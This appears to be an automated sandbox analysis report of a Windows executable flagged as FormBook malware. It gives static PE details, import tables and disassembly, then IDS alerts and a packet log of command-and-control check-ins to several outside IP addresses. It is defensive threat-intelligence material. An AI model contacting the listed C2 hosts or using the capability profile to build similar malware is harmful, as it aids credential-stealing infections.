                              SSDEEP:49152:gTvC/MTQYxsWR7a73AUUJQ5KVNPpEseZdTv:IjTQYxsWRAA3JbNPGTv
                              TLSH:6F85E00273D1D022FF9B92334F9AF6515ABC79260123A61F13981DB9BE701B1563E7A3
                              File Content Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......................j:......j:..C...j:......@.*...............................n.......~.............{.......{.......{.........z....

                              File Icon

                              Icon Hash:aaf3e3e3938382a0

                              Static PE Info

                              General

                              Entrypoint:0x420577
                              Entrypoint Section:.text
                              Digitally signed:false
                              Imagebase:0x400000
                              Subsystem:windows gui
                              Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                              Time Stamp:0x66E76F38 [Sun Sep 15 23:35:20 2024 UTC]
                              TLS Callbacks:
                              CLR (.Net) Version:
                              OS Version Major:5
                              OS Version Minor:1
                              File Version Major:5
                              File Version Minor:1
                              Subsystem Version Major:5
                              Subsystem Version Minor:1
                              Import Hash:948cc502fe9226992dce9417f952fce3

                              Entrypoint Preview

                              Instruction
                              call 00007FEE88E62233h
                              jmp 00007FEE88E61B3Fh
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007FEE88E61D1Dh
                              mov dword ptr [esi], 0049FDF0h
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 0049FDF8h
                              mov dword ptr [ecx], 0049FDF0h
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              push dword ptr [ebp+08h]
                              mov esi, ecx
                              call 00007FEE88E61CEAh
                              mov dword ptr [esi], 0049FE0Ch
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              and dword ptr [ecx+04h], 00000000h
                              mov eax, ecx
                              and dword ptr [ecx+08h], 00000000h
                              mov dword ptr [ecx+04h], 0049FE14h
                              mov dword ptr [ecx], 0049FE0Ch
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              mov esi, ecx
                              lea eax, dword ptr [esi+04h]
                              mov dword ptr [esi], 0049FDD0h
                              and dword ptr [eax], 00000000h
                              and dword ptr [eax+04h], 00000000h
                              push eax
                              mov eax, dword ptr [ebp+08h]
                              add eax, 04h
                              push eax
                              call 00007FEE88E648DDh
                              pop ecx
                              pop ecx
                              mov eax, esi
                              pop esi
                              pop ebp
                              retn 0004h
                              lea eax, dword ptr [ecx+04h]
                              mov dword ptr [ecx], 0049FDD0h
                              push eax
                              call 00007FEE88E64928h
                              pop ecx
                              ret
                              push ebp
                              mov ebp, esp
                              push esi
                              mov esi, ecx
                              lea eax, dword ptr [esi+04h]
                              mov dword ptr [esi], 0049FDD0h
                              push eax
                              call 00007FEE88E64911h
                              test byte ptr [ebp+08h], 00000001h
                              pop ecx

                              Rich Headers

                              Programming Language:
                              • [ C ] VS2008 SP1 build 30729
                              • [IMP] VS2008 SP1 build 30729

                              Data Directories

                              NameVirtual AddressVirtual Size Is in Section
                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IMPORT0xc8e640x17c.rdata
                              IMAGE_DIRECTORY_ENTRY_RESOURCE0xd40000xce494.rsrc
                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1a30000x7594.reloc
                              IMAGE_DIRECTORY_ENTRY_DEBUG0xb0ff00x1c.rdata
                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                              IMAGE_DIRECTORY_ENTRY_TLS0xc34000x18.rdata
                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xb10100x40.rdata
                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_IAT0x9c0000x894.rdata
                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                              Sections

                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                              .text0x10000x9ab1d0x9ac000a1473f3064dcbc32ef93c5c8a90f3a6False0.565500681542811data6.668273581389308IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                              .rdata0x9c0000x2fb820x2fc00c9cf2468b60bf4f80f136ed54b3989fbFalse0.35289185209424084data5.691811547483722IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .data0xcc0000x706c0x480053b9025d545d65e23295e30afdbd16d9False0.04356553819444445DOS executable (block device driver @\273\)0.5846666986982398IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                              .rsrc0xd40000xce4940xce600ad4811ecdd85a79aeb0a0f14a7665c9cFalse0.9681892602967899data7.970595614197665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                              .reloc0x1a30000x75940x7600c68ee8931a32d45eb82dc450ee40efc3False0.7628111758474576data6.7972128181359786IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                              Resources

                              NameRVASizeTypeLanguageCountryZLIB Complexity
                              RT_ICON0xd45a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                              RT_ICON0xd46d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                              RT_ICON0xd47f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                              RT_ICON0xd49200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                              RT_ICON0xd4c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                              RT_ICON0xd4d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                              RT_ICON0xd5bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                              RT_ICON0xd64800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                              RT_ICON0xd69e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                              RT_ICON0xd8f900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                              RT_ICON0xda0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                              RT_MENU0xda4a00x50dataEnglishGreat Britain0.9
                              RT_STRING0xda4f00x594dataEnglishGreat Britain0.3333333333333333
                              RT_STRING0xdaa840x68adataEnglishGreat Britain0.2735961768219833
                              RT_STRING0xdb1100x490dataEnglishGreat Britain0.3715753424657534
                              RT_STRING0xdb5a00x5fcdataEnglishGreat Britain0.3087467362924282
                              RT_STRING0xdbb9c0x65cdataEnglishGreat Britain0.34336609336609336
                              RT_STRING0xdc1f80x466dataEnglishGreat Britain0.3605683836589698
                              RT_STRING0xdc6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                              RT_RCDATA0xdc7b80xc575cdata1.0003165198640942
                              RT_GROUP_ICON0x1a1f140x76dataEnglishGreat Britain0.6610169491525424
                              RT_GROUP_ICON0x1a1f8c0x14dataEnglishGreat Britain1.25
                              RT_GROUP_ICON0x1a1fa00x14dataEnglishGreat Britain1.15
                              RT_GROUP_ICON0x1a1fb40x14dataEnglishGreat Britain1.25
                              RT_VERSION0x1a1fc80xdcdataEnglishGreat Britain0.6181818181818182
                              RT_MANIFEST0x1a20a40x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                              Imports

                              DLLImport
                              WSOCK32.dllgethostbyname, recv, send, socket, inet_ntoa, setsockopt, ntohs, WSACleanup, WSAStartup, sendto, htons, __WSAFDIsSet, select, accept, listen, bind, inet_addr, ioctlsocket, recvfrom, WSAGetLastError, closesocket, gethostname, connect
                              VERSION.dllGetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
                              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                              COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                              MPR.dllWNetGetConnectionW, WNetCancelConnection2W, WNetUseConnectionW, WNetAddConnection2W
                              WININET.dllHttpOpenRequestW, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, InternetConnectW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetQueryDataAvailable
                              PSAPI.DLLGetProcessMemoryInfo
                              IPHLPAPI.DLLIcmpSendEcho, IcmpCloseHandle, IcmpCreateFile
                              USERENV.dllDestroyEnvironmentBlock, LoadUserProfileW, CreateEnvironmentBlock, UnloadUserProfile
                              UxTheme.dllIsThemeActive
                              KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetShortPathNameW, DeleteFileW, IsDebuggerPresent, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, LoadResource, LockResource, SizeofResource, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, LoadLibraryW, GetLocalTime, CompareStringW, GetCurrentThread, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, VirtualAlloc, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, ResetEvent, WaitForSingleObjectEx, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, CloseHandle, GetFullPathNameW, GetStartupInfoW, GetSystemTimeAsFileTime, InitializeSListHead, RtlUnwind, SetLastError, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, ResumeThread, FreeLibraryAndExitThread, GetACP, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetStringTypeW, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, ReadConsoleW, GetTimeZoneInformation, FindFirstFileExW, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableA, SetCurrentDirectoryW, FindNextFileW, WriteConsoleW
                              USER32.dllGetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, PeekMessageW, GetInputState, UnregisterHotKey, CharLowerBuffW, MonitorFromPoint, MonitorFromRect, LoadImageW, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, ClientToScreen, GetCursorPos, DeleteMenu, CheckMenuRadioItem, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, LockWindowUpdate, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, RegisterHotKey, GetCursorInfo, SetWindowPos, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, TrackPopupMenuEx, GetMessageW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, DispatchMessageW, keybd_event, TranslateMessage, ScreenToClient
                              GDI32.dllEndPath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, GetDeviceCaps, SetPixel, CloseFigure, LineTo, AngleArc, MoveToEx, Ellipse, CreateCompatibleBitmap, CreateCompatibleDC, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, SelectObject, StretchBlt, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, CreateDCW, GetPixel, DeleteDC, GetDIBits, StrokePath
                              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
                              ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, RegCreateKeyExW, GetSecurityDescriptorDacl, GetAclInformation, GetUserNameW, AddAce, SetSecurityDescriptorDacl, InitiateSystemShutdownExW
                              SHELL32.dllDragFinish, DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW
                              ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                              OLEAUT32.dllCreateStdDispatch, CreateDispTypeInfo, UnRegisterTypeLib, UnRegisterTypeLibForUser, RegisterTypeLibForUser, RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, VariantChangeType, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysStringLen, QueryPathOfRegTypeLib, SysAllocString, VariantInit, VariantClear, DispCallFunc, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, SafeArrayDestroyDescriptor, VariantCopy, OleLoadPicture

                              Possible Origin

                              Language of compilation systemCountry where language is spokenMap
                              EnglishGreat Britain

                              Network Behavior

                              Suricata IDS Alerts

                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-09-16T09:29:43.875285+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.54971147.57.185.22780TCP
                              2024-09-16T09:30:07.474250+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55864989.58.49.180TCP
                              2024-09-16T09:30:29.659742+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.558653154.23.184.24080TCP
                              2024-09-16T09:30:43.414357+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55865785.159.66.9380TCP
                              2024-09-16T09:30:56.798181+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.558661185.173.111.7680TCP
                              2024-09-16T09:31:10.331009+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.558665203.161.43.22880TCP
                              2024-09-16T09:31:23.649305+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.558669161.97.168.24580TCP
                              2024-09-16T09:31:38.353891+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.558673172.96.191.3980TCP
                              2024-09-16T09:31:51.621138+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.558677104.21.20.12580TCP
                              2024-09-16T09:32:07.548753+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55490743.242.202.16980TCP
                              2024-09-16T09:32:28.946660+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.554911104.207.148.13780TCP
                              2024-09-16T09:32:42.501756+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.554915185.104.29.1280TCP
                              2024-09-16T09:32:56.015666+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55491965.21.196.9080TCP
                              2024-09-16T09:33:18.095887+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.55492347.57.185.22780TCP

                              Network Port Distribution

                              TCP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Sep 16, 2024 09:29:42.972903967 CEST4971180192.168.2.547.57.185.227
                              Sep 16, 2024 09:29:42.977763891 CEST804971147.57.185.227192.168.2.5
                              Sep 16, 2024 09:29:42.978001118 CEST4971180192.168.2.547.57.185.227
                              Sep 16, 2024 09:29:42.989041090 CEST4971180192.168.2.547.57.185.227
                              Sep 16, 2024 09:29:42.994009018 CEST804971147.57.185.227192.168.2.5
                              Sep 16, 2024 09:29:43.875068903 CEST804971147.57.185.227192.168.2.5
                              Sep 16, 2024 09:29:43.875190973 CEST804971147.57.185.227192.168.2.5
                              Sep 16, 2024 09:29:43.875284910 CEST4971180192.168.2.547.57.185.227
                              Sep 16, 2024 09:29:43.896369934 CEST4971180192.168.2.547.57.185.227
                              Sep 16, 2024 09:29:43.901299000 CEST804971147.57.185.227192.168.2.5
                              Sep 16, 2024 09:29:58.991215944 CEST5864680192.168.2.589.58.49.1
                              Sep 16, 2024 09:29:58.996145964 CEST805864689.58.49.1192.168.2.5
                              Sep 16, 2024 09:29:58.996243954 CEST5864680192.168.2.589.58.49.1
                              Sep 16, 2024 09:29:59.009834051 CEST5864680192.168.2.589.58.49.1
                              Sep 16, 2024 09:29:59.014763117 CEST805864689.58.49.1192.168.2.5
                              Sep 16, 2024 09:29:59.652570009 CEST805864689.58.49.1192.168.2.5
                              Sep 16, 2024 09:29:59.652631044 CEST805864689.58.49.1192.168.2.5
                              Sep 16, 2024 09:29:59.652684927 CEST5864680192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:00.526138067 CEST5864680192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:01.546165943 CEST5864780192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:01.551170111 CEST805864789.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:01.551278114 CEST5864780192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:01.563714027 CEST5864780192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:01.568695068 CEST805864789.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:02.206929922 CEST805864789.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:02.207448959 CEST805864789.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:02.207520962 CEST5864780192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:03.073026896 CEST5864780192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:04.091510057 CEST5864880192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:04.096515894 CEST805864889.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:04.096616983 CEST5864880192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:04.109462023 CEST5864880192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:04.114264965 CEST805864889.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:04.114428043 CEST805864889.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:04.733069897 CEST805864889.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:04.733141899 CEST805864889.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:04.733196020 CEST5864880192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:05.648406029 CEST5864880192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:06.654176950 CEST5864980192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:06.731545925 CEST805864989.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:06.731729031 CEST5864980192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:06.738957882 CEST5864980192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:06.743733883 CEST805864989.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:07.474097967 CEST805864989.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:07.474126101 CEST805864989.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:07.474144936 CEST805864989.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:07.474250078 CEST5864980192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:07.476799965 CEST5864980192.168.2.589.58.49.1
                              Sep 16, 2024 09:30:07.481600046 CEST805864989.58.49.1192.168.2.5
                              Sep 16, 2024 09:30:20.818113089 CEST5865080192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:20.823070049 CEST8058650154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:20.823195934 CEST5865080192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:20.836724997 CEST5865080192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:20.841516972 CEST8058650154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:21.735294104 CEST8058650154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:21.735354900 CEST8058650154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:21.735481977 CEST5865080192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:22.355849028 CEST5865080192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:23.372821093 CEST5865180192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:23.634933949 CEST8058651154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:23.635024071 CEST5865180192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:23.650276899 CEST5865180192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:23.655111074 CEST8058651154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:24.552614927 CEST8058651154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:24.552628994 CEST8058651154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:24.552709103 CEST5865180192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:25.166840076 CEST5865180192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:26.185045004 CEST5865280192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:26.190017939 CEST8058652154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:26.190115929 CEST5865280192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:26.199429035 CEST5865280192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:26.206142902 CEST8058652154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:26.206161022 CEST8058652154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:27.097513914 CEST8058652154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:27.097531080 CEST8058652154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:27.097738028 CEST5865280192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:27.713773012 CEST5865280192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:28.732743979 CEST5865380192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:28.737752914 CEST8058653154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:28.737916946 CEST5865380192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:28.745003939 CEST5865380192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:28.749850035 CEST8058653154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:29.659447908 CEST8058653154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:29.659468889 CEST8058653154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:29.659742117 CEST5865380192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:29.662379980 CEST5865380192.168.2.5154.23.184.240
                              Sep 16, 2024 09:30:29.667251110 CEST8058653154.23.184.240192.168.2.5
                              Sep 16, 2024 09:30:34.768515110 CEST5865480192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:34.778500080 CEST805865485.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:34.778574944 CEST5865480192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:34.790605068 CEST5865480192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:34.800605059 CEST805865485.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:36.291996956 CEST5865480192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:36.298460960 CEST805865485.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:36.299251080 CEST5865480192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:37.342355013 CEST5865580192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:37.347292900 CEST805865585.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:37.347362995 CEST5865580192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:37.478934050 CEST5865580192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:37.483859062 CEST805865585.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:38.994982004 CEST5865580192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:39.001595974 CEST805865585.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:39.001671076 CEST5865580192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:40.037658930 CEST5865680192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:40.042720079 CEST805865685.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:40.046017885 CEST5865680192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:40.133606911 CEST5865680192.168.2.585.159.66.93
                              Sep 16, 2024 09:30:40.138634920 CEST805865685.159.66.93192.168.2.5
                              Sep 16, 2024 09:30:40.138672113 CEST805865685.159.66.93192.168.2.5
